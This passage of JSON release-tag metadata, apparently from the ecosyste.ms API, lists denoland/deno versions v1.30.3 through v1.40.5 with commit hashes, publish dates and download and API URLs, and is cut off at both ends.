itHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/man